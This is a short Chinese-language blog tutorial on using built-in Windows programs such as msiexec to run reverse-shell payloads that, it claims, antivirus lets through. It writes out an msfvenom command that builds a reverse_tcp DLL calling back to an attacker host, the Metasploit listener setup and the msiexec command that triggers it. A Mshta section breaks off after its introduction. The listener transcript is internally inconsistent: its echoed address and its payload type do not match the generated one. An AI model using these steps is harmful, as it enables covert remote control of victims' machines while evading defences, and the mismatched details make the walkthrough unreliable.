基于白名单的Payload

时间:2019-08-14
本文章向大家介绍基于白名单的Payload,主要包括基于白名单的Payload使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。

通过使用系统的一些服务进程完成Shell反弹,由于系统进程多数具有微软特征,所以自带免杀,杀毒软件都会默认放行

利用 Msiexec 命令反弹

Msiexec是Windows Installer的一部分。用于安装Windows Installer安装包(MSI),一般在运行Microsoft Update安装更新或安装部分软件的时候出现,占用内存比较大。并且集成于Windows 7,Windows 10等,在Windows 10系统中无需配置环境变量就能直接被调用,非常的方便。

1.首先生成Payload.

[root@localhost ~]# msfvenom -p windows/x64/shell/reverse_tcp \
>                              -b '\x00\x0b' lhost=192.168.1.30 lport=8888 \
>                              -f dll > lyshark.dll

2.将Dll拷贝到目标主机,MSF主机执行命令,开启监听。

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > set lhost 192.168.1.30
lhost => 192.168.1.7
msf5 exploit(multi/handler) > set lport 8888
lport => 8888
msf5 exploit(multi/handler) > exploit -j -z

3.客户端执行如下CMD命令,即可上线。

C:\> msiexec -y C:\Users\lyshark\Desktop\lyshark.dll

利用 Mshta 命令反弹

Mshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记语言应用,用于执行.HTA文件。

原文地址:https://www.cnblogs.com/LyShark/p/11332441.html